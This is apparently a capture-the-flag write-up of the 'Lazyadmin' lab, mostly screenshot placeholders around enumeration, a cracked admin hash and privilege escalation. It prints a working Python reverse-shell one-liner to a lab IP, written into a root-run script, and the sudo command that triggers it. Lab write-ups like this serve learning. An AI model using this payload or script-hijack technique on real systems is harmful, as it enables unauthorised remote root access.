Post

Lazyadmin

Lazyadmin

Lazyadmin

Pasted image 20260601193433.png

πŸ” Enumeration & MD5 Decrypting

πŸ•΅οΈ I found several URLs: Pasted image 20260601194633.png I found several URLs: Pasted image 20260601194705.png Pasted image 20260601194718.png

  • Username: manager

  • Password (MD5 Hash): 42f749ade7f9e195bf475f37a44cafcb =Pasted image 20260601194922.png

http://10.49.130.161/content/as/

πŸ•΅οΈ Executing Reverse Shell

πŸ’» Awesome! Pasted image 20260601194938.png Pasted image 20260601201932.png

Pasted image 20260601201910.png Pasted image 20260601202007.png Awesome! Pasted image 20260601202116.png

⚑ Script Hijacking & Privilege Escalation

πŸ’‘ I explored the system further: Pasted image 20260601202319.png

We can run backup.pl with sudo without a password. I checked the content of backup.pl using cat: Pasted image 20260601202548.png

⚑ Since it runs with root privileges, we can modify the copy.sh script it executes: Pasted image 20260601203048.png

I tried nc but it failed, so I used Python instead:

1
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.49.111.180\",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"sh\")'" > /etc/copy.sh

Then I executed the Perl script:

1
sudo /usr/bin/perl /home/itguy/backup.pl

Pasted image 20260601203409.png Pasted image 20260601203449.png 🏁 I got the root flag!

This post is licensed under CC BY 4.0 by the author.